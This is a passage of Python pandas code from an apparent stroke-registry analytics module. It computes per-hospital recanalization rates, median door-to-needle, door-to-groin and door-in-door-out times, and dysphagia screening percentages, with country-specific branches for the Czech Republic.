recanalized_df = isch.loc[isch['IVT_DONE'].isin([1]) | isch['TBY_DONE'].isin([1])]
self.statsDf['# patients recanalized'] = self._count_patients(dataframe=recanalized_df)
recanalized_denominator_df = isch.loc[isch['IVT_DONE'].isin([1]) | isch['TBY_DONE'].isin([1]) | isch['RECANALIZATION_PROCEDURES'].isin([1])]
self.statsDf['denominator'] =self._count_patients(dataframe=recanalized_denominator_df)
#self.statsDf['# patients recanalized'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone'], axis=1)
#self.statsDf['% patients recanalized'] = self.statsDf.apply(lambda x: round(((x['# patients recanalized']/(x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'])) * 100), 2) if (x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre']) > 0 else 0, axis=1)
#self.statsDf['% patients recanalized'] = self.statsDf.apply(lambda x: round(((x['# patients recanalized']/(x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] - x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'])) * 100), 2) if (x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] - x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre']) > 0 else 0, axis=1)
self.statsDf['% patients recanalized'] = self.statsDf.apply(lambda x: round(((x['# patients recanalized']/x['denominator']) * 100), 2) if x['denominator'] > 0 else 0, axis=1)
self.statsDf.drop(['denominator'], inplace=True, axis=1)
else:
self.statsDf['# patients recanalized'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone'], axis=1)
self.statsDf['% patients recanalized'] = self.statsDf.apply(lambda x: round(((x['# patients recanalized']/(x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] - x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'])) * 100), 2) if (x['isch_patients'] - x['# recanalization procedures - Referred to another centre for endovascular treatment'] - x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] - x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre']) > 0 else 0, axis=1)
"""
##############
# MEDIAN DTN #
##############
def _median_confidence_interval(data, confidence=0.95):
""" The function calculating median confidence interval.
:param confidence: the value of confidence interval
:type confidence: int/float
:returns: rv.median(), rv.interval(confidence)
"""
a = np.array(data)
w = a + 1
# create custom discrete random variable from data set
rv = st.rv_discrete(values=(data, w/w.sum()))
return rv.median(), rv.interval(confidence)
def _mean_confidence_interval(data, confidence=0.95):
""" The function calculating mean confidence interval.
:param confidence: the value of confidence interval
:type confidence: int/float
:returns: m, m-h, m+h
"""
n = len(data)
m = mean(data)
std_err = sem(data)
h = std_err * t.ppf((1 + confidence) / 2, n - 1)
return m, m-h, m+h
# tag::median_dtn[]
# Calculate number of patients who underwent IVT
self.tmp = isch.loc[~isch['HOSPITAL_STROKE_IVT_TIMESTAMPS'].isin([1])].groupby(['Protocol ID', 'IVT_DONE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="IVT_DONE", value=1, new_column_name='# IV tPa')
self.statsDf['% IV tPa'] = self.statsDf.apply(lambda x: round(((x['# IV tPa']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombolysis
recanalization_procedure_iv_tpa = isch.loc[(isch['IVT_DONE'].isin([1])) & (~isch['HOSPITAL_STROKE_IVT_TIMESTAMPS'].isin([1]))].copy()
# recanalization_procedure_iv_tpa = isch.loc[isch['IVT_DONE'].isin([1])].copy()
recanalization_procedure_iv_tpa.fillna(0, inplace=True)
# Create one column with times of door to thrombolysis
thrombolysis = recanalization_procedure_iv_tpa[(recanalization_procedure_iv_tpa['IVTPA'] > 0) & (recanalization_procedure_iv_tpa['IVTPA'] <= 400)].copy()
tmp = thrombolysis.groupby(['Protocol ID']).IVTPA.agg(['median']).rename(columns={'median': 'Median DTN (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
del thrombolysis
# end::median_dtn[]
"""
if country_code == 'CZ':
self.tmp = isch.groupby(['Protocol ID', 'IVT_DONE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="IVT_DONE", value=1, new_column_name='# IV tPa')
self.statsDf['% IV tPa'] = self.statsDf.apply(lambda x: round(((x['# IV tPa']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombolysis
recanalization_procedure_iv_tpa = isch[isch['IVT_DONE'].isin([1])].copy()
recanalization_procedure_iv_tpa.fillna(0, inplace=True)
# Create one column with times of door to thrombolysis
thrombolysis = recanalization_procedure_iv_tpa[(recanalization_procedure_iv_tpa['IVTPA'] > 0) & (recanalization_procedure_iv_tpa['IVTPA'] <= 400)].copy()
tmp = thrombolysis.groupby(['Protocol ID']).IVTPA.agg(['median']).rename(columns={'median': 'Median DTN (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
else:
self.statsDf.loc[:, '# IV tPa'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'], axis=1)
self.statsDf['% IV tPa'] = self.statsDf.apply(lambda x: round(((x['# IV tPa']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombolysis
recanalization_procedure_iv_tpa = isch[isch['RECANALIZATION_PROCEDURES'].isin([2, 3, 5])].copy()
recanalization_procedure_iv_tpa.fillna(0, inplace=True)
# Create one column with times of door to thrombolysis
recanalization_procedure_iv_tpa['IVTPA'] = recanalization_procedure_iv_tpa['IVT_ONLY_NEEDLE_TIME'] + recanalization_procedure_iv_tpa['IVT_ONLY_NEEDLE_TIME_MIN'] + recanalization_procedure_iv_tpa['IVT_TBY_NEEDLE_TIME'] + recanalization_procedure_iv_tpa['IVT_TBY_NEEDLE_TIME_MIN'] + recanalization_procedure_iv_tpa['IVT_TBY_REFER_NEEDLE_TIME'] + recanalization_procedure_iv_tpa['IVT_TBY_REFER_NEEDLE_TIME_MIN']
# sites_ids = recanalization_procedure_iv_tpa['Protocol ID'].tolist()
# sites_ids = set(sites_ids)
# interval_vals = {}
# for idx, val in enumerate(sites_ids):
# meanv, lbound, ubound = _mean_confidence_interval(recanalization_procedure_iv_tpa[recanalization_procedure_iv_tpa['Protocol ID'] == val]['IVTPA'].tolist())
# medianv, interval_median = _median_confidence_interval(recanalization_procedure_iv_tpa[recanalization_procedure_iv_tpa['Protocol ID'] == val]['IVTPA'].tolist())
# interval_vals[str(idx)] = [val, "({0:.2f},{1:.2f})".format(lbound, ubound), "{0}".format(interval_median)]
# #interval_vals.append("{0}: ({1}-{2})".format(i, lowb, upb))
# #print(interval_vals)
# interval_vals_df = pd.DataFrame.from_dict(interval_vals, orient='index', columns=['Protocol ID', 'Confidence interval DTN (Mean)', 'Confidence interval DTN (Median)'])
tmp = recanalization_procedure_iv_tpa.groupby(['Protocol ID']).IVTPA.agg(['median']).rename(columns={'median': 'Median DTN (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
# self.statsDf = self.statsDf.merge(interval_vals_df, how='outer')
"""
##############
# MEDIAN DTG #
##############
# tag::median_dtg[]
self.tmp = isch.loc[~isch['HOSPITAL_STROKE_TBY_TIMESTAMPS'].isin([1])].groupby(['Protocol ID', 'TBY_DONE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="TBY_DONE", value=1, new_column_name='# TBY')
self.statsDf['% TBY'] = self.statsDf.apply(lambda x: round(((x['# TBY']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombolysis
recanalization_procedure_tby_dtg = isch.loc[(isch['TBY_DONE'].isin([1])) & (~isch['HOSPITAL_STROKE_TBY_TIMESTAMPS'].isin([1]))].copy()
# recanalization_procedure_tby_dtg = isch.loc[isch['TBY_DONE'].isin([1])].copy()
recanalization_procedure_tby_dtg.fillna(0, inplace=True)
# Create one column with times of door to thrombolysis
thrombectomy = recanalization_procedure_tby_dtg[(recanalization_procedure_tby_dtg['TBY'] > 0) & (recanalization_procedure_tby_dtg['TBY'] <= 700)].copy()
tmp = thrombectomy.groupby(['Protocol ID']).TBY.agg(['median']).rename(columns={'median': 'Median DTG (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
del thrombectomy
# end::median_dtg[]
"""
# Seperate calculation of TBY for CZ
if country_code == 'CZ':
self.tmp = isch.groupby(['Protocol ID', 'TBY_DONE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="TBY_DONE", value=1, new_column_name='# TBY')
self.statsDf['% TBY'] = self.statsDf.apply(lambda x: round(((x['# TBY']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombolysis
recanalization_procedure_tby_dtg = isch[isch['TBY_DONE'].isin([1])].copy()
recanalization_procedure_tby_dtg.fillna(0, inplace=True)
# Create one column with times of door to thrombolysis
thrombectomy = recanalization_procedure_tby_dtg[(recanalization_procedure_tby_dtg['TBY'] > 0) & (recanalization_procedure_tby_dtg['TBY'] <= 700)].copy()
tmp = thrombectomy.groupby(['Protocol ID']).TBY.agg(['median']).rename(columns={'median': 'Median DTG (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
"""
# self.statsDf.loc[:, '# TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] + x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'], axis=1)
"""
self.statsDf.loc[:, '# TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - IV tPa + endovascular treatment'], axis=1)
self.statsDf['% TBY'] = self.statsDf.apply(lambda x: round(((x['# TBY']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombectomy
# recanalization_procedure_tby_dtg = isch[isch['RECANALIZATION_PROCEDURES'].isin([4, 3, 6, 7, 8])].copy()
recanalization_procedure_tby_dtg = isch[isch['RECANALIZATION_PROCEDURES'].isin([4, 3])].copy()
recanalization_procedure_tby_dtg.fillna(0, inplace=True)
# Get IVTPA in minutes
# recanalization_procedure_tby_dtg['TBY'] = recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_PUNCTURE_TIME'] + recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_TIME_MIN'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME_MIN'] + recanalization_procedure_tby_dtg['TBY_REFER_ALL_GROIN_PUNCTURE_TIME'] + recanalization_procedure_tby_dtg['TBY_REFER_LIM_GROIN_PUNCTURE_TIME'] + recanalization_procedure_tby_dtg['TBY_REFER_ALL_GROIN_PUNCTURE_TIME_MIN'] + recanalization_procedure_tby_dtg['TBY_REFER_LIM_GROIN_PUNCTURE_TIME_MIN']
recanalization_procedure_tby_dtg['TBY'] = recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_PUNCTURE_TIME'] + recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_TIME_MIN'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME_MIN']
"""
# sites_ids = recanalization_procedure_tby_dtg['Protocol ID'].tolist()
# sites_ids = set(sites_ids)
# interval_vals = {}
# for idx, val in enumerate(sites_ids):
# meanv, lbound, ubound = _mean_confidence_interval(recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['Protocol ID'] == val]['TBY'].tolist())
# medianv, interval_median = _median_confidence_interval(recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['Protocol ID'] == val]['TBY'].tolist())
# interval_vals[str(idx)] = [val, "({0:.2f}-{1:.2f})".format(lbound, ubound), "{0}".format(interval_median)]
# interval_vals_df = pd.DataFrame.from_dict(interval_vals, orient='index', columns=['Protocol ID', 'Confidence interval DTG (Mean)', 'Confidence interval DTG (Median)'])
# recanalization_procedure_tby['TBY'] = recanalization_procedure_tby.loc[:, ['TBY_ONLY_GROIN_PUNCTURE_TIME', 'TBY_ONLY_GROIN_PUNCTURE_TIME_MIN', 'IVT_TBY_GROIN_TIME', 'IVT_TBY_GROIN_TIME_MIN']].sum(1).reset_index()[0].tolist()
"""
else:
self.statsDf.loc[:, '# TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - IV tPa + endovascular treatment'], axis=1)
self.statsDf['% TBY'] = self.statsDf.apply(lambda x: round(((x['# TBY']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombectomy
recanalization_procedure_tby_dtg = isch[isch['RECANALIZATION_PROCEDURES'].isin([4, 3])].copy()
recanalization_procedure_tby_dtg.fillna(0, inplace=True)
# Create one column with times of door to thrombectomy
recanalization_procedure_tby_dtg['TBY'] = recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_PUNCTURE_TIME'] + recanalization_procedure_tby_dtg['TBY_ONLY_GROIN_TIME_MIN'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME'] + recanalization_procedure_tby_dtg['IVT_TBY_GROIN_TIME_MIN']
# sites_ids = recanalization_procedure_tby_dtg['Protocol ID'].tolist()
# sites_ids = set(sites_ids)
# interval_vals = {}
# for idx, val in enumerate(sites_ids):
# meanv, lbound, ubound = _mean_confidence_interval(recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['Protocol ID'] == val]['IVTPA'].tolist())
# medianv, interval_median = _median_confidence_interval(recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['Protocol ID'] == val]['IVTPA'].tolist())
# interval_vals[str(idx)] = [val, "({0:.2f}-{1:.2f})".format(lbound, ubound), "{0}".format(interval_median)]
# interval_vals_df = pd.DataFrame.from_dict(interval_vals, orient='index', columns=['Protocol ID', 'Confidence interval DTG (Mean)', 'Confidence interval DTG (Median)'])
# recanalization_procedure_tby['TBY'] = recanalization_procedure_tby.loc[:, ['TBY_ONLY_GROIN_PUNCTURE_TIME', 'TBY_ONLY_GROIN_PUNCTURE_TIME_MIN', 'IVT_TBY_GROIN_TIME', 'IVT_TBY_GROIN_TIME_MIN']].sum(1).reset_index()[0].tolist()
tmp = recanalization_procedure_tby_dtg.groupby(['Protocol ID']).TBY.agg(['median']).rename(columns={'median': 'Median DTG (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
# self.statsDf = self.statsDf.merge(interval_vals_df, how='outer')
"""
###############
# MEDIAN DIDO #
###############
# tag::median_dido[]
self.tmp = isch.groupby(['Protocol ID', 'REFERRED_DONE']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="REFERRED_DONE", value=1, new_column_name='# DIDO TBY')
self.statsDf['% DIDO TBY'] = self.statsDf.apply(lambda x: round(((x['# DIDO TBY']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been treated with thrombolysis
recanalization_procedure_tby_dido = isch[isch['REFERRED_DONE'].isin([1])].copy()
recanalization_procedure_tby_dido.fillna(0, inplace=True)
# Create one column with times of door to thrombolysis
dido = recanalization_procedure_tby_dido[(recanalization_procedure_tby_dido['DIDO'] > 0)].copy()
tmp = dido.groupby(['Protocol ID']).DIDO.agg(['median']).rename(columns={'median': 'Median TBY DIDO (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
del recanalization_procedure_tby_dido, dido
# end::median_dido[]
"""
if country_code == 'CZ':
# self.statsDf.loc[:, '# DIDO TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment'], axis=1)
self.statsDf.loc[:, '# DIDO TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] + x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'], axis=1)
# self.statsDf['% DIDO TBY'] = self.statsDf.apply(lambda x: round(((x['# DIDO TBY']/(x['isch_patients'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'] - x['# recanalization procedures - Not done'])) * 100), 2) if (x['isch_patients'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'] - x['# recanalization procedures - Not done']) > 0 else 0, axis=1)
# Get only patients recanalized TBY
# recanalization_procedure_tby_dido = isch[isch['RECANALIZATION_PROCEDURES'].isin([5, 6, 7, 8])].copy()
# For CZ remove referred for endovascular treatment from DIDO time because they are taking it as the patient was referred to them for TBY
# recanalization_procedure_tby_dido = isch[isch['RECANALIZATION_PROCEDURES'].isin([5, 6])].copy()
# Create temporary dataframe with the patients who has been transferred for recanalization procedures
recanalization_procedure_tby_dido = isch[isch['RECANALIZATION_PROCEDURES'].isin([5, 6, 7, 8])].copy()
recanalization_procedure_tby_dido.fillna(0, inplace=True)
# Get DIDO in minutes
# recanalization_procedure_tby_dido['DIDO'] = recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME_MIN']
# recanalization_procedure_tby_dido['DIDO'] = recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME_MIN']
# Create one column with times of door-in door-out time
recanalization_procedure_tby_dido['DIDO'] = recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME_MIN']
tmp = recanalization_procedure_tby_dido.groupby(['Protocol ID']).DIDO.agg(['median']).rename(columns={'median': 'Median TBY DIDO (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
else:
self.statsDf.loc[:, '# DIDO TBY'] = self.statsDf.apply(lambda x: x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment'] + x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] + x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre'], axis=1)
# self.statsDf['% DIDO TBY'] = self.statsDf.apply(lambda x: round(((x['# DIDO TBY']/(x['isch_patients'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'] - x['# recanalization procedures - Not done'])) * 100), 2) if (x['isch_patients'] - x['# recanalization procedures - Returned to the initial centre after recanalization procedures were performed at another centre'] - x['# recanalization procedures - Not done']) > 0 else 0, axis=1)
# Create temporary dataframe with the patients who has been transferred for recanalization procedures
recanalization_procedure_tby_dido = isch[isch['RECANALIZATION_PROCEDURES'].isin([5, 6, 7, 8])].copy()
recanalization_procedure_tby_dido.fillna(0, inplace=True)
# Create one column with times of door-in door-out time
recanalization_procedure_tby_dido['DIDO'] = recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['IVT_TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_ALL_DIDO_TIME_MIN'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME'] + recanalization_procedure_tby_dido['TBY_REFER_LIM_DIDO_TIME_MIN']
tmp = recanalization_procedure_tby_dido.groupby(['Protocol ID']).DIDO.agg(['median']).rename(columns={'median': 'Median TBY DIDO (minutes)'}).reset_index()
self.statsDf = self.statsDf.merge(tmp, how='outer')
self.statsDf.fillna(0, inplace=True)
"""
#######################
# DYPSHAGIA SCREENING #
#######################
# For CZ exclude CVT from the calculation
# tag::dysphagia_screening[]
if country_code == 'CZ':
is_ich_not_referred = is_ich.loc[~(is_ich['crf_parent_name'].isin(['F_RESQ_IVT_TBY_CZ_4']) & is_ich['RECANALIZATION_PROCEDURES'].isin([5,6]))].copy()
self.statsDf['is_ich_not_referred_patients'] = self._count_patients(dataframe=is_ich_not_referred)
self.tmp = is_ich_not_referred.groupby(['Protocol ID', 'DYSPHAGIA_SCREENING']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=6, new_column_name='# dysphagia screening - not known')
self.statsDf['% dysphagia screening - not known'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - not known']/x['is_ich_not_referred_patients']) * 100), 2) if x['is_ich_not_referred_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=1, new_column_name='# dysphagia screening - Guss test')
self.statsDf['% dysphagia screening - Guss test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Guss test']/(x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=2, new_column_name='# dysphagia screening - Other test')
self.statsDf['% dysphagia screening - Other test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Other test']/(x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=3, new_column_name='# dysphagia screening - Another centre')
self.statsDf['% dysphagia screening - Another centre'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Another centre']/(x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=4, new_column_name='# dysphagia screening - Not done')
self.statsDf['% dysphagia screening - Not done'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Not done']/(x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=5, new_column_name='# dysphagia screening - Unable to test')
self.statsDf['% dysphagia screening - Unable to test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Unable to test']/(x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_not_referred_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
# self.statsDf['# dysphagia screening done'] = self.statsDf['# dysphagia screening - Guss test'] + self.statsDf['# dysphagia screening - Other test'] + self.statsDf['# dysphagia screening - Another centre']
self.statsDf['# dysphagia screening done'] = self.statsDf['# dysphagia screening - Guss test'] + self.statsDf['# dysphagia screening - Other test']
# self.statsDf['% dysphagia screening done'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening done']/(x['is_ich_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
self.statsDf['% dysphagia screening done'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening done']/(x['# dysphagia screening done'] + x['# dysphagia screening - Not done'])) * 100), 2) if (x['# dysphagia screening done'] + x['# dysphagia screening - Not done']) > 0 else 0, axis=1)
else:
self.tmp = is_ich_cvt.groupby(['Protocol ID', 'DYSPHAGIA_SCREENING']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=6, new_column_name='# dysphagia screening - not known')
self.statsDf['% dysphagia screening - not known'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - not known']/x['is_ich_cvt_patients']) * 100), 2) if x['is_ich_cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=1, new_column_name='# dysphagia screening - Guss test')
self.statsDf['% dysphagia screening - Guss test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Guss test']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=2, new_column_name='# dysphagia screening - Other test')
self.statsDf['% dysphagia screening - Other test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Other test']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=3, new_column_name='# dysphagia screening - Another centre')
self.statsDf['% dysphagia screening - Another centre'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Another centre']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=4, new_column_name='# dysphagia screening - Not done')
self.statsDf['% dysphagia screening - Not done'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Not done']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING", value=5, new_column_name='# dysphagia screening - Unable to test')
self.statsDf['% dysphagia screening - Unable to test'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening - Unable to test']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
self.statsDf['# dysphagia screening done'] = self.statsDf['# dysphagia screening - Guss test'] + self.statsDf['# dysphagia screening - Other test'] + self.statsDf['# dysphagia screening - Another centre']
self.statsDf['% dysphagia screening done'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening done']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
# end::dysphagia_screening[]
############################
# DYPSHAGIA SCREENING TIME #
############################
